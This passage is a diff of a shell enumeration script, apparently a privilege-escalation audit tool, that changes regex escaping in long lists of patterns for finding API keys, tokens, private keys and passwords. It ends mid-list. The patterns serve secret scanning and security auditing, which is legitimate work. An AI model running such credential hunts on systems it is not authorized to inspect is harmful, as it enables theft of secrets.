search_for_regex "Coinlib API Key" "(coinlib[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{16})['\"]" 1 - search_for_regex "Contentful delivery API Key" "(contentful[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9=_\-]{43})['\"]" 1 + search_for_regex "Coinlayer API Key" "(coinlayer[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"]" 1 + search_for_regex "Coinlib API Key" "(coinlib[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{16})['\"]" 1 + search_for_regex "Contentful delivery API Key" "(contentful[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9=_\\-]{43})['\"]" 1 search_for_regex "Covalent API Key" "ckey_[a-z0-9]{27}" - search_for_regex "Charity Search API Key" "(charity.?search[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"]" 1 + search_for_regex "Charity Search API Key" "(charity.?search[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"]" 1 search_for_regex "Databricks API Key" "dapi[a-h0-9]{32}" - search_for_regex "DDownload API Key" "(ddownload[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{22})['\"]" 1 - search_for_regex "Defined Networking API token" "(dnkey-[a-z0-9=_\-]{26}-[a-z0-9=_\-]{52})" - search_for_regex "Discord API Key, Client ID & Client Secret" "((discord[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-h0-9]{64}|[0-9]{18}|[a-z0-9=_\-]{32})['\"])" 1 + search_for_regex "DDownload API Key" "(ddownload[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{22})['\"]" 1 + search_for_regex "Defined Networking API token" "(dnkey-[a-z0-9=_\\-]{26}-[a-z0-9=_\\-]{52})" + search_for_regex "Discord API Key, Client ID & Client Secret" "((discord[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-h0-9]{64}|[0-9]{18}|[a-z0-9=_\\-]{32})['\"])" 1 search_for_regex "Dropbox API Key" "sl.[a-zA-Z0-9_-]{136}" - search_for_regex "Doppler API Key" "(dp\.pt\.)[a-zA-Z0-9]{43}" - search_for_regex "Dropbox API secret/key, short & long lived API Key" "(dropbox[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{15}|sl\.[a-z0-9=_\-]{135}|[a-z0-9]{11}(AAAAAAAAAA)[a-z0-9_=\-]{43})['\"]" 1 + search_for_regex "Doppler API Key" "(dp\\.pt\\.)[a-zA-Z0-9]{43}" + search_for_regex "Dropbox API secret/key, short & long lived API Key" "(dropbox[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{15}|sl\\.[a-z0-9=_\\-]{135}|[a-z0-9]{11}(AAAAAAAAAA)[a-z0-9_=\\-]{43})['\"]" 1 search_for_regex "Duffel API Key" "duffel_(test|live)_[a-zA-Z0-9_-]{43}" - search_for_regex "Dynatrace API Key" "dt0c01\.[a-zA-Z0-9]{24}\.[a-z0-9]{64}" + search_for_regex "Dynatrace API Key" "dt0c01\\.[a-zA-Z0-9]{24}\\.[a-z0-9]{64}" search_for_regex "EasyPost API Key" "EZAK[a-zA-Z0-9]{54}" search_for_regex "EasyPost test API Key" "EZTK[a-zA-Z0-9]{54}" - search_for_regex "Etherscan API Key" "(etherscan[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([A-Z0-9]{34})['\"]" + search_for_regex "Etherscan API Key" "(etherscan[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([A-Z0-9]{34})['\"]" search_for_regex "Facebook Access Token" "EAACEdEose0cBA[0-9A-Za-z]+" search_for_regex "Facebook Client ID" "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" search_for_regex "Facebook Oauth" "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" search_for_regex "Facebook Secret Key" "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" - search_for_regex "Fastly API Key" "(fastly[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9=_\-]{32})['\"]" 1 - search_for_regex "Finicity API Key & Client Secret" "(finicity[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-f0-9]{32}|[a-z0-9]{20})['\"]" 1 + search_for_regex "Fastly API Key" "(fastly[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9=_\\-]{32})['\"]" 1 + search_for_regex "Finicity API Key & Client Secret" "(finicity[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-f0-9]{32}|[a-z0-9]{20})['\"]" 1 search_for_regex "Flutterweave Keys" "FLWPUBK_TEST-[a-hA-H0-9]{32}-X|FLWSECK_TEST-[a-hA-H0-9]{32}-X|FLWSECK_TEST[a-hA-H0-9]{12}" - search_for_regex "Frame.io API Key" "fio-u-[a-zA-Z0-9_=\-]{64}" + search_for_regex "Frame.io API Key" "fio-u-[a-zA-Z0-9_=\\-]{64}" search_for_regex "Github" "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" search_for_regex "Github App Token" "(ghu|ghs)_[0-9a-zA-Z]{36}" search_for_regex "Github OAuth Access Token" "gho_[0-9a-zA-Z]{36}" search_for_regex "Github Personal Access Token" "ghp_[0-9a-zA-Z]{36}" search_for_regex "Github Refresh Token" "ghr_[0-9a-zA-Z]{76}" search_for_regex "GitHub Fine-Grained Personal Access Token" "github_pat_[0-9a-zA-Z_]{82}" - search_for_regex "Gitlab Personal Access Token" "glpat-[0-9a-zA-Z\-]{20}" + search_for_regex "Gitlab Personal Access Token" "glpat-[0-9a-zA-Z\\-]{20}" search_for_regex "GitLab Pipeline Trigger Token" "glptt-[0-9a-f]{40}" - search_for_regex "GitLab Runner Registration Token" "GR1348941[0-9a-zA-Z_\-]{20}" - search_for_regex "GoCardless API Key" "live_[a-zA-Z0-9_=\-]{40}" - search_for_regex "GoFile API Key" "(gofile[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9]{32})['\"]" 1 - search_for_regex "Google API Key" "AIza[0-9A-Za-z_\-]{35}" - search_for_regex "Google Cloud Platform API Key" "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" - search_for_regex "Google Drive Oauth" "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" - search_for_regex "Google Oauth Access Token" "ya29\.[0-9A-Za-z_\-]+" + search_for_regex "GitLab Runner Registration Token" "GR1348941[0-9a-zA-Z_\\-]{20}" + search_for_regex "GoCardless API Key" "live_[a-zA-Z0-9_=\\-]{40}" + search_for_regex "GoFile API Key" "(gofile[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9]{32})['\"]" 1 + search_for_regex "Google API Key" "AIza[0-9A-Za-z_\\-]{35}" + search_for_regex "Google Cloud Platform API Key" "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\\-]{35}]['\"]" + search_for_regex "Google Drive Oauth" "[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com" + search_for_regex "Google Oauth Access Token" "ya29\\.[0-9A-Za-z_\\-]+" search_for_regex "Google (GCP) Service-account" "\"type.+:.+\"service_account" - search_for_regex "Grafana API Key" "eyJrIjoi[a-z0-9_=\-]{72,92}" 1 - search_for_regex "Grafana cloud api token" "glc_[A-Za-z0-9\+/]{32,}={0,2}" + search_for_regex "Grafana API Key" "eyJrIjoi[a-z0-9_=\\-]{72,92}" 1 + search_for_regex "Grafana cloud api token" "glc_[A-Za-z0-9\\+/]{32,}={0,2}" search_for_regex "Grafana service account token" "(glsa_[A-Za-z0-9]{32}_[A-Fa-f0-9]{8})" - search_for_regex "Hashicorp Terraform user/org API Key" "[a-z0-9]{14}\.atlasv1\.[a-z0-9_=\-]{60,70}" + search_for_regex "Hashicorp Terraform user/org API Key" "[a-z0-9]{14}\\.atlasv1\\.[a-z0-9_=\\-]{60,70}" search_for_regex "Heroku API Key" "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" search_for_regex "Hubspot API Key" "['\"][a-h0-9]{8}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{12}['\"]" 1 - search_for_regex "Instatus API Key" "(instatus[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"]" 1 - search_for_regex "Intercom API Key & Client Secret/ID" "(intercom[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9=_]{60}|[a-h0-9]{8}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{12})['\"]" 1 - search_for_regex "Ionic API Key" "(ionic[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"](ion_[a-z0-9]{42})['\"]" 1 + search_for_regex "Instatus API Key" "(instatus[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"]" 1 + search_for_regex "Intercom API Key & Client Secret/ID" "(intercom[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9=_]{60}|[a-h0-9]{8}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{12})['\"]" 1 + search_for_regex "Ionic API Key" "(ionic[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"](ion_[a-z0-9]{42})['\"]" 1 search_for_regex "Jenkins Creds" "<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<" - search_for_regex "JSON Web Token" "(ey[0-9a-z]{30,34}\.ey[0-9a-z\/_\-]{30,}\.[0-9a-zA-Z\/_\-]{10,}={0,2})" + search_for_regex "JSON Web Token" "(ey[0-9a-z]{30,34}\\.ey[0-9a-z\\/_\\-]{30,}\\.[0-9a-zA-Z\\/_\\-]{10,}={0,2})" search_for_regex "Linear API Key" "(lin_api_[a-zA-Z0-9]{40})" - search_for_regex "Linear Client Secret/ID" "((linear[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-f0-9]{32})['\"])" + search_for_regex "Linear Client Secret/ID" "((linear[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-f0-9]{32})['\"])" search_for_regex "LinkedIn Client ID" "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" search_for_regex "LinkedIn Secret Key" "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" - search_for_regex "Lob API Key" "((lob[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]((live|test)_[a-f0-9]{35})['\"])|((lob[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]((test|live)_pub_[a-f0-9]{31})['\"])" 1 + search_for_regex "Lob API Key" "((lob[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]((live|test)_[a-f0-9]{35})['\"])|((lob[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]((test|live)_pub_[a-f0-9]{31})['\"])" 1 search_for_regex "Lob Publishable API Key" "((test|live)_pub_[a-f0-9]{31})" - search_for_regex "MailboxValidator" "(mailbox.?validator[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([A-Z0-9]{20})['\"]" 1 + search_for_regex "MailboxValidator" "(mailbox.?validator[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([A-Z0-9]{20})['\"]" 1 search_for_regex "Mailchimp API Key" "[0-9a-f]{32}-us[0-9]{1,2}" search_for_regex "Mailgun API Key" "key-[0-9a-zA-Z]{32}'" search_for_regex "Mailgun Public Validation Key" "pubkey-[a-f0-9]{32}" search_for_regex "Mailgun Webhook signing key" "[a-h0-9]{32}-[a-h0-9]{8}-[a-h0-9]{8}" search_for_regex "Mandrill API Key" "md-[A-Za-z0-9]{22}" - search_for_regex "Mapbox API Key" "(pk\.[a-z0-9]{60}\.[a-z0-9]{22})" 1 - search_for_regex "MessageBird API Key & API client ID" "(messagebird[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{25}|[a-h0-9]{8}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{12})['\"]" 1 - search_for_regex "Microsoft Teams Webhook" "https:\/\/[a-z0-9]+\.webhook\.office\.com\/webhookb2\/[a-z0-9]{8}-([a-z0-9]{4}-){3}[a-z0-9]{12}@[a-z0-9]{8}-([a-z0-9]{4}-){3}[a-z0-9]{12}\/IncomingWebhook\/[a-z0-9]{32}\/[a-z0-9]{8}-([a-z0-9]{4}-){3}[a-z0-9]{12}" - search_for_regex "New Relic User API Key, User API ID & Ingest Browser API Key" "(NRAK-[A-Z0-9]{27})|((newrelic[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([A-Z0-9]{64})['\"])|(NRJS-[a-f0-9]{19})" - search_for_regex "Nownodes" "(nownodes[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([A-Za-z0-9]{32})['\"]" + search_for_regex "Mapbox API Key" "(pk\\.[a-z0-9]{60}\\.[a-z0-9]{22})" 1 + search_for_regex "MessageBird API Key & API client ID" "(messagebird[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{25}|[a-h0-9]{8}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{12})['\"]" 1 + search_for_regex "Microsoft Teams Webhook" "https:\\/\\/[a-z0-9]+\\.webhook\\.office\\.com\\/webhookb2\\/[a-z0-9]{8}-([a-z0-9]{4}-){3}[a-z0-9]{12}@[a-z0-9]{8}-([a-z0-9]{4}-){3}[a-z0-9]{12}\\/IncomingWebhook\\/[a-z0-9]{32}\\/[a-z0-9]{8}-([a-z0-9]{4}-){3}[a-z0-9]{12}" + search_for_regex "New Relic User API Key, User API ID & Ingest Browser API Key" "(NRAK-[A-Z0-9]{27})|((newrelic[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([A-Z0-9]{64})['\"])|(NRJS-[a-f0-9]{19})" + search_for_regex "Nownodes" "(nownodes[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([A-Za-z0-9]{32})['\"]" search_for_regex "Npm Access Token" "(npm_[a-zA-Z0-9]{36})" search_for_regex "OpenAI API Token" "sk-[A-Za-z0-9]{48}" search_for_regex "ORB Intelligence Access Key" "['\"][a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}['\"]" - search_for_regex "Pastebin API Key" "(pastebin[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"]" 1 - search_for_regex "PayPal Braintree Access Token" "access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}" + search_for_regex "Pastebin API Key" "(pastebin[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"]" 1 + search_for_regex "PayPal Braintree Access Token" "access_token\\$production\\$[0-9a-z]{16}\\$[0-9a-f]{32}" search_for_regex "Picatic API Key" "sk_live_[0-9a-z]{32}" - search_for_regex "Pinata API Key" "(pinata[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{64})['\"]" 1 - search_for_regex "Planetscale API Key" "pscale_tkn_[a-zA-Z0-9_\.\-]{43}" - search_for_regex "PlanetScale OAuth token" "(pscale_oauth_[a-zA-Z0-9_\.\-]{32,64})" - search_for_regex "Planetscale Password" "pscale_pw_[a-zA-Z0-9_\.\-]{43}" + search_for_regex "Pinata API Key" "(pinata[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{64})['\"]" 1 + search_for_regex "Planetscale API Key" "pscale_tkn_[a-zA-Z0-9_\\.\\-]{43}" + search_for_regex "PlanetScale OAuth token" "(pscale_oauth_[a-zA-Z0-9_\\.\\-]{32,64})" + search_for_regex "Planetscale Password" "pscale_pw_[a-zA-Z0-9_\\.\\-]{43}" search_for_regex "Plaid API Token" "(access-(?:sandbox|development|production)-[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})" search_for_regex "Prefect API token" "(pnu_[a-z0-9]{36})" search_for_regex "Postman API Key" "PMAK-[a-fA-F0-9]{24}-[a-fA-F0-9]{34}" - search_for_regex "Private Keys" "\-\-\-\-\-BEGIN PRIVATE KEY\-\-\-\-\-|\-\-\-\-\-BEGIN RSA PRIVATE KEY\-\-\-\-\-|\-\-\-\-\-BEGIN OPENSSH PRIVATE KEY\-\-\-\-\-|\-\-\-\-\-BEGIN PGP PRIVATE KEY BLOCK\-\-\-\-\-|\-\-\-\-\-BEGIN DSA PRIVATE KEY\-\-\-\-\-|\-\-\-\-\-BEGIN EC PRIVATE KEY\-\-\-\-\-" + search_for_regex "Private Keys" "\\-\\-\\-\\-\\-BEGIN PRIVATE KEY\\-\\-\\-\\-\\-|\\-\\-\\-\\-\\-BEGIN RSA PRIVATE KEY\\-\\-\\-\\-\\-|\\-\\-\\-\\-\\-BEGIN OPENSSH PRIVATE KEY\\-\\-\\-\\-\\-|\\-\\-\\-\\-\\-BEGIN PGP PRIVATE KEY BLOCK\\-\\-\\-\\-\\-|\\-\\-\\-\\-\\-BEGIN DSA PRIVATE KEY\\-\\-\\-\\-\\-|\\-\\-\\-\\-\\-BEGIN EC PRIVATE KEY\\-\\-\\-\\-\\-" search_for_regex "Pulumi API Key" "pul-[a-f0-9]{40}" - search_for_regex "PyPI upload token" "pypi-AgEIcHlwaS5vcmc[A-Za-z0-9_\-]{50,}" - search_for_regex "Quip API Key" "(quip[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9]{15}=\|[0-9]{10}\|[a-zA-Z0-9\/+]{43}=)['\"]" 1 + search_for_regex "PyPI upload token" "pypi-AgEIcHlwaS5vcmc[A-Za-z0-9_\\-]{50,}" + search_for_regex "Quip API Key" "(quip[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9]{15}=\\|[0-9]{10}\\|[a-zA-Z0-9\\/+]{43}=)['\"]" 1 search_for_regex "Rubygem API Key" "rubygems_[a-f0-9]{48}" search_for_regex "Readme API token" "rdme_[a-z0-9]{70}" search_for_regex "Sendbird Access ID" "([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})" - search_for_regex "Sendgrid API Key" "SG\.[a-zA-Z0-9_\.\-]{66}" + search_for_regex "Sendgrid API Key" "SG\\.[a-zA-Z0-9_\\.\\-]{66}" search_for_regex "Sendinblue API Key" "xkeysib-[a-f0-9]{64}-[a-zA-Z0-9]{16}" search_for_regex "Shippo API Key, Access Token, Custom Access Token, Private App Access Token & Shared Secret" "shippo_(live|test)_[a-f0-9]{40}|shpat_[a-fA-F0-9]{32}|shpca_[a-fA-F0-9]{32}|shppa_[a-fA-F0-9]{32}|shpss_[a-fA-F0-9]{32}" search_for_regex "Sidekiq Secret" "([a-f0-9]{8}:[a-f0-9]{8})" search_for_regex "Sidekiq Sensitive URL" "([a-f0-9]{8}:[a-f0-9]{8})@(?:gems.contribsys.com|enterprise.contribsys.com)" search_for_regex "Slack Token" "xox[baprs]-([0-9a-zA-Z]{10,48})?" search_for_regex "Slack Webhook" "https://hooks.slack.com/services/T[a-zA-Z0-9_]{10}/B[a-zA-Z0-9_]{10}/[a-zA-Z0-9_]{24}" - search_for_regex "Smarksheel API Key" "(smartsheet[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{26})['\"]" 1 - search_for_regex "Square Access Token" "sqOatp-[0-9A-Za-z_\-]{22}" + search_for_regex "Smarksheel API Key" "(smartsheet[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{26})['\"]" 1 + search_for_regex "Square Access Token" "sqOatp-[0-9A-Za-z_\\-]{22}" search_for_regex "Square API Key" "EAAAE[a-zA-Z0-9_-]{59}" - search_for_regex "Square Oauth Secret" "sq0csp-[ 0-9A-Za-z_\-]{43}" - search_for_regex "Stytch API Key" "secret-.*-[a-zA-Z0-9_=\-]{36}" + search_for_regex "Square Oauth Secret" "sq0csp-[ 0-9A-Za-z_\\-]{43}" + search_for_regex "Stytch API Key" "secret-.*-[a-zA-Z0-9_=\\-]{36}" search_for_regex "Stripe Access Token & API Key" "(sk|pk)_(test|live)_[0-9a-z]{10,32}|k_live_[0-9a-zA-Z]{24}" 1 - search_for_regex "Telegram Bot API Token" "[0-9]+:AA[0-9A-Za-z\\-_]{33}" - search_for_regex "Trello API Key" "(trello[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([0-9a-z]{32})['\"]" + search_for_regex "Telegram Bot API Token" "[0-9]+:AA[0-9A-Za-z\\\\-_]{33}" + search_for_regex "Trello API Key" "(trello[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([0-9a-z]{32})['\"]" search_for_regex "Twilio API Key" "SK[0-9a-fA-F]{32}" - search_for_regex "Twitch API Key" "(twitch[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{30})['\"]" + search_for_regex "Twitch API Key" "(twitch[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{30})['\"]" search_for_regex "Twitter Client ID" "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" search_for_regex "Twitter Bearer Token" "(A{22}[a-zA-Z0-9%]{80,100})" - search_for_regex "Twitter Oauth" "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" + search_for_regex "Twitter Oauth" "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\\\s][0-9a-zA-Z]{35,44}['\"\\\\s]" search_for_regex "Twitter Secret Key" "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" - search_for_regex "Typeform API Key" "tfp_[a-z0-9_\.=\-]{59}" + search_for_regex "Typeform API Key" "tfp_[a-z0-9_\\.=\\-]{59}" search_for_regex "URLScan API Key" "['\"][a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}['\"]" - search_for_regex "Yandex Access Token" "(t1\.[A-Z0-9a-z_-]+[=]{0,2}\.[A-Z0-9a-z_-]{86}[=]{0,2})" - search_for_regex "Yandex API Key" "(AQVN[A-Za-z0-9_\-]{35,38})" - search_for_regex "Web3 API Key" "(web3[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([A-Za-z0-9_=\-]+\.[A-Za-z0-9_=\-]+\.?[A-Za-z0-9_.+/=\-]*)['\"]" 1 + search_for_regex "Yandex Access Token" "(t1\\.[A-Z0-9a-z_-]+[=]{0,2}\\.[A-Z0-9a-z_-]{86}[=]{0,2})" + search_for_regex "Yandex API Key" "(AQVN[A-Za-z0-9_\\-]{35,38})" + search_for_regex "Web3 API Key" "(web3[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([A-Za-z0-9_=\\-]+\\.[A-Za-z0-9_=\\-]+\\.?[A-Za-z0-9_.+/=\\-]*)['\"]" 1 echo '' print_2title "Searching Misc" search_for_regex "Generic Secret" "[sS][eE][cC][rR][eE][tT].*['\"][0-9a-zA-Z]{32,45}['\"]" - search_for_regex "PHP defined password" "define ?\(['\"](\w*pass|\w*pwd|\w*user|\w*datab)" + search_for_regex "PHP defined password" "define ?\\(['\"](\\w*pass|\\w*pwd|\\w*user|\\w*datab)" search_for_regex "Simple Passwords" "passw.*[=:].+" - search_for_regex "Generic API tokens search (A-C)" "(access_key|access_token|account_sid|admin_email|admin_pass|admin_user|adzerk_api_key|algolia_admin_key|algolia_api_key| algolia_search_key|alias_pass|alicloud_access_key|alicloud_secret_key|amazon_bucket_name|amazon_secret_access_key| amazonaws|anaconda_token|android_docs_deploy_token|ansible_vault_password|aos_key|aos_sec| api_key|api_key_secret|api_key_sid|api_secret|apiary_api_key|apigw_access_token|api.googlemaps|AIza|apidocs| apikey|apiSecret|app_bucket_perm|appclientsecret|app_debug|app_id|appkey|appkeysecret|app_key|app_log_level|app_report_token_key| app_secret|app_token|apple_id_password|application_key|appsecret|appspot|argos_token|artifactory_key|artifacts_aws_access_key_id| artifacts_aws_secret_access_key|artifacts_bucket|artifacts_key|artifacts_secret|assistant_iam_apikey|auth0_api_clientsecret| auth0_client_secret|auth_token|authorizationToken|author_email_addr|author_npm_api_key|authsecret|awsaccesskeyid|aws_access| aws_access_key|aws_access_key_id|aws_bucket|aws_config_accesskeyid|aws_key|aws_secret|aws_secret_access_key|awssecretkey| aws_secret_key|aws_secrets|aws_ses_access_key_id|aws_ses_secret_access_key|aws_token|awscn_access_key_id|awscn_secret_access_key| AWSSecretKey|b2_app_key|b2_bucket|bashrc password|bintray_api_key|bintray_apikey|bintray_gpg_password|bintray_key| bintray_token|bintraykey|bluemix_api_key|bluemix_auth|bluemix_pass|bluemix_pass_prod|bluemix_password|bluemix_pwd|bluemix_username brackets_repo_oauth_token|browser_stack_access_key|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id| bucketeer_aws_secret_access_key|built_branch_deploy_key|bundlesize_github_token|bx_password|bx_username|cache_driver| cache_s3_secret_key|cargo_token|cattle_access_key|cattle_agent_instance_auth|cattle_secret_key|censys_secret|certificate_password| cf_password|cheverny_token|chrome_client_secret|chrome_refresh_token|ci_deploy_password|ci_project_url|ci_registry_user| ci_server_name|ci_user_token|claimr_database|claimr_db|claimr_superuser|claimr_token|cli_e2e_cma_token|client_secret| client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key| cloudant_archived_database|cloudant_audited_database|cloudant_database|cloudant_instance|cloudant_order_database| cloudant_parsed_database|cloudant_password|cloudant_processed_database|cloudant_service_database| cloudflare_api_key|cloudflare_auth_email|cloudflare_auth_key|cloudflare_email|cloudinary_api_secret|cloudinary_name| cloudinary_url|cloudinary_url_staging|clu_repo_url|clu_ssh_private_key_base64|cn_access_key_id|cn_secret_access_key| cocoapods_trunk_email|cocoapods_trunk_token|codacy_project_token|codeclimate_repo_token|codecov_token|coding_token| conekta_apikey|conn.login|connectionstring|consumerkey|consumer_key|consumer_secret|contentful_access_token| contentful_cma_test_token|contentful_integration_management_token|contentful_integration_management_token| contentful_management_api_access_token|contentful_management_api_access_token_new|contentful_php_management_test_token| contentful_test_org_cma_token|contentful_v2_access_token|conversation_password|conversation_username|cos_secrets| coveralls_api_token|coveralls_repo_token|coveralls_token|coverity_scan_token|credentials| cypress_record_key)[a-z0-9_ .,<\-]{0,25}(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([0-9a-zA-Z_=\-]{8,64})['\"]" - search_for_regex "Generic API tokens search (D-H)" "(danger_github_api_token|database_host|database_name|database_password|database_port|database_schema_test| database_user|database_username|datadog_api_key|datadog_app_key|db_connection|db_database|db_host|db_password| db_pw|db_server|db_user|db_username|dbpasswd|dbpassword|dbuser|ddg_test_email|ddg_test_email_pw|ddgc_github_token| deploy_password|deploy_secure|deploy_token|deploy_user|dgpg_passphrase|digitalocean_access_token| 